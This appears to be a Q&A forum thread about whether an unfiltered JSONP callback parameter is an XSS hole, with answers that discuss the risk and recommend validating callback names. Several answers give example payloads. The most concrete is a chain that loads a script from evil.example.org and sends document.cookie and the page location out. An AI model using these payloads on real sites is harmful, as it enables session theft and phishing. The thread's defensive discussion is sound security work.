# Apparent jsonp xss vulnerability

Tags: javascript, security, xss, jsonp

Some of our customers have chimed in about a perceived XSS vulnerability in all of our JSONP endpoints, but I disagree as to whether or not it actually constitutes a vulnerability.  Wanted to get the community's opinion to make sure I'm not missing something.

So, as with any jsonp system, we have an endpoint like:

```
http://foo.com/jsonp?cb=callback123
```

where the value of the cb parameter is replayed back in the response:

```
callback123({"foo":"bar"});
```

Customers have complained that we don't filter out HTML in the CB parameter, so they'll contrive an example like so:

```
http://foo.com/jsonp?cb=<body onload="alert('h4x0rd');"/><!--
```

Obviously for a URL that returns the content type of `text/html`, this poses a problem wherein the browser renders that HTML and then executes the potentially malicious javascript in the onload handler.  Could be used to steal cookies and submit them to the attacker's site, or even to generate a fake login screen for phishing.  User checks the domain and sees that it's one he trusts, so he goes agead and logs in.

But, in our case, we're setting the content type header to `application/javascript` which causes various different behaviors in different browsers.  i.e. Firefox just displays the raw text, whereas IE opens up a "save as..." dialog.  I don't consider either of those to be particularly exploitable.  The Firefox user isn't going to read malicious text telling him to jump off a bridge and think much of it.  And the IE user is probably going to be confused by the save as dialog and hit cancel.

I guess I could see a case where the IE user is tricked into saving and opening the .js file, which then goes through the microsoft JScript engine and gets all sorts of access to the user's machine; but that seems unlikely.  Is that the biggest threat here or is there some other vulnerability that I missed?

(Obviously I'm going to "fix" by putting in filtering to only accept a valid javascript identifier, with some length limit just-in-case; but I just wanted a dialog about what other threats I might have missed.)

Comment: "I just wanted a dialog about what other threats I might have missed" what is the question.. and thank God that customers have only "complained" I am surprised they not hacked your site!

Comment: Also. document.write and innerHTML - I have found both these commands as solutions when using the application/javascript headers on my nginx server - solves my IE or any other issues. The page just executes text or code as normal

Answer (score 4):

Their injection would have to be something like `</script><h1>pwned</h1>`

It would be relatively trivial for you to verify that `$_GET['callback']` (assuming PHP) is a valid JavaScript function name.

The whole point of JSONP is getting around browser restrictions that try and prevent XSS-type vulnerabilities, so to some level there needs to be trust between the JSONP provider and the requesting site.

HOWEVER, the vulnerability ONLY appears if the client isn't smartly handling user input - if they hardcode all of their JSONP callback names, then there is no potential for a vulnerability.

Answer (score 3):

Your site would have an XSS vulnerability if the name of that callback (the value of "cb") were derived blindly from some other previously-input value.  The fact that a user can create a URL manually that sends JavaScript through your JSONP API and back again is no more interesting than the fact that they can run that same JavaScript directly through the browser's JavaScript console.

Now, if your site were to ship back some JSON content to that callback which used unfiltered user input from the form, or more insidiously from some other form that previously stored something in your database, then you'd have a problem. Like, if you had a "Comments" field in your response:

```
callback123({ "restaurantName": "Dirty Pete's Burgers", "comment": "x"+alert("haxored")+"y" })
```

then that comment, whose value was `x"+alert("haxored")+"y`, would be an XSS attack. However any good JSON encoder would fix that by quoting the double-quote characters.

That said, there'd be no harm in ensuring that the callback name is a valid JavaScript identifier. There's really not much else you can do anyway, since by definition your public JSONP service, in order to work properly, is supposed to do whatever the client page wants it to do.

Answer (score 2):

Another example would be making two requests like these:

```
https://example.org/api.php
?callback=$.getScript('//evil.example.org/x.js');var dontcare=(
```

which would call:

```
$.getScript('//evil.example.org/x.js');var dontcare= ({ ... });
```

And evil.example.org/x.js would request:

```
https://example.org/api.php
?callback=new Mothership({cookie:document.cookie, loc: window.location, apidata:
```

which would call:

```
new Mothership({cookie:document.cookie, loc: window.location, apidata: { .. });
```

Possibilities are endless.

See [Do I need to sanitize the callback parameter from a JSONP call?](https://stackoverflow.com/questions/2777021/do-i-need-to-sanitize-the-callback-parameter-from-a-jsonp-call/8811412#8811412) for an example of sanitizing a JSON callback.

Note: Internet Explorer tends to ignore the `Content-Type` header by default. It is stubborn, and goes to look at the first few bytes of the HTTP response directly, and if it looks kinda of HTML, it will proceed to parse and execute it all as text/html, including inline scripts.

Comment: Keep in mind that inserting just javascript doesn't do anything for anybody.  That's only going to get eval'd if it's invoked as JSONP from some other page controlled by the attacker (or a trustworthy user of my SDK).  document.cookie and window.location are going to point to the SDK consumer's site in that case... not going to reveal any information they didn't already have access to.  They'd basically just be wasting their time with an overcomplicated implementation.

Comment: When it's malicious HTML being interpreted, it's a little different though.  The attack in that case involves the hacker tricking the user into clicking on his special link, so then the whole shabang gets executed in my site's sandbox, not the hacker's.  So then he CAN read document.domain etc.  I'm, curious as to which versions of IE will ignore the content-type though.  Do you have more information on which versions, or what magic content it looks for?  I tested 7 8 and 9.  Don't have 6 installed anymore, but I recall seeing it behave the same way in the past.

Answer (score 1):

There's nothing to stop them from doing something that inserts code, if that is the case.

Imagine a URL such as `http://example.com/jsonp?cb=HTMLFormElement.prototype.submit = function() { /* send form data to some third-party server */ };foo`. When this gets received by the client, depending on how you handle JSONP, you may introduce the ability to run JS of arbitrary complexity.

As for how this is an attack vector: imagine an HTTP proxy, that is a transparent forwarding proxy for all URLs except `http://example.com/jsonp`, where it takes the cb part of the query string and prepends some malicious JS before it, and redirects to that URL.

Comment: Ehhh, you're presupposing that the hacker has routed the user through a malicious proxy under his control.  Hacker doesn't need to muck with my JSONP parameters in that case.  He can just insert whatever he wants wherever he wants.

Comment: True --- but doing that allows it to be done far more subtly.

Answer (score 0):

As Pointy indicates, solely calling the URL directly is not exploitable. However, if any of your own javascript code makes calls to the JSON service with user-supplied data and either renders the values in the response to the document, or `eval()`s the response (whether now, or sometime in the future as your app evolves over time) then you have a genuinely exploitable XSS vulnerability.

Personally I would still consider this a low risk vulnerability, even though it may not be exploitable today. Why not address it now and remove the risk of it being partly responsible for introducing a higher-risk vulnerability at some point in the future?